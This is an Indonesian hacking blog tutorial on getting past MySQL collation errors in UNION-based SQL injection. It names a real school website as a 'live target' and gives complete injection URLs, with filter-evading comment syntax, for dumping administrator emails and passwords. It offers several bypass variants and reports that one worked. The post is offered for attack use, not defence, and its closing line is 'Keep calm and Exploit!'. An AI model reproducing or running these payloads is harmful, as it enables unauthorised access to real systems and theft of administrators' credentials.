Bypass SQL Injection Illegal mix of collations for operation 'UNION' + Live Target 2021
Halo gan balik lagi nih am admin fooster xD kali ini admin bakal ngasih tutor Bypass SQL Injection illegal mix of collations for operation 'UNION'
Baca juga :
# Tutor
Live Target : https://nyayanagarpublicschool.in/about_us.php?id=3
Pertama-tama kalian lakukan SQL Injection seperti biasa.
Tutor SQL Injection Manual + Bypass 403 : klik
Disini saya terkena error illegal mix of collations for operation 'UNION' saat ingin men dump email dan password dari column administrators
url : https://nyayanagarpublicschool.in/about_us.php?id=-3%27+/*!50000UnIoN*/%20/*!50000SeLeCt*/+1,group_concat(EMAIL,0x3a,PASSWORD),3,4+from+administrators--+-
# Bypass
ada beberapa metode untuk bypass illegal mix of collations for operation 'UNION'
Berikut adalah metode yang bisa digunakan untuk bypass illegal mix of collations for operation 'UNION' :
1. UNCOMPRESS
Query : https://nyayanagarpublicschool.in/about_us.php?id=-3%27+/*!50000UnIoN*/%20/*!50000SeLeCt*/+1,uncompress(compress(group_concat(EMAIL,0x3a,PASSWORD))),3,4+from+administrators--+-
2. UNHEX
Query : https://nyayanagarpublicschool.in/about_us.php?id=-3%27+/*!50000UnIoN*/%20/*!50000SeLeCt*/+1,unhex(hex(group_concat(EMAIL,0x3a,PASSWORD))),3,4+from+administrators--+-
3. CAST
Query : https://nyayanagarpublicschool.in/about_us.php?id=-3%27+/*!50000UnIoN*/%20/*!50000SeLeCt*/+1,cast(EMAIL,0x3a,PASSWORD as binary),3,4+from+administrators--+-
4. CONVERT
Query : https://nyayanagarpublicschool.in/about_us.php?id=-3%27+/*!50000UnIoN*/%20/*!50000SeLeCt*/+1,covert(EMAIL,0x3a,PASSWORD using ascii),3,4+from+administrators--+-
jika teknik COVERT menggunakan ascii tidak berfungsi maka dapat diganti :
1. ujis
2. ucs2
3. tis620
4. swe7
5. sjis
6. macroman
7. macce
8. latin7
9. latin5
10. latin 2
Disini saya menggunakan metode UNHEX dan hasilnya berhasil.
url : https://nyayanagarpublicschool.in/about_us.php?id=-3%27+/*!50000UnIoN*/%20/*!50000SeLeCt*/+1,unhex(hex(group_concat(EMAIL,0x3a,PASSWORD))),3,4+from+administrators--+-
PENUTUPAN
Nah itu tadi adalah artikel Bypass SQL Injection Illegal mix of collations for operation 'UNION' + Live Target 2021, jika merasa artikel ini bermanfaat bisa share ke temen2 kalian xD
Keep calm and Exploit!
Post a Comment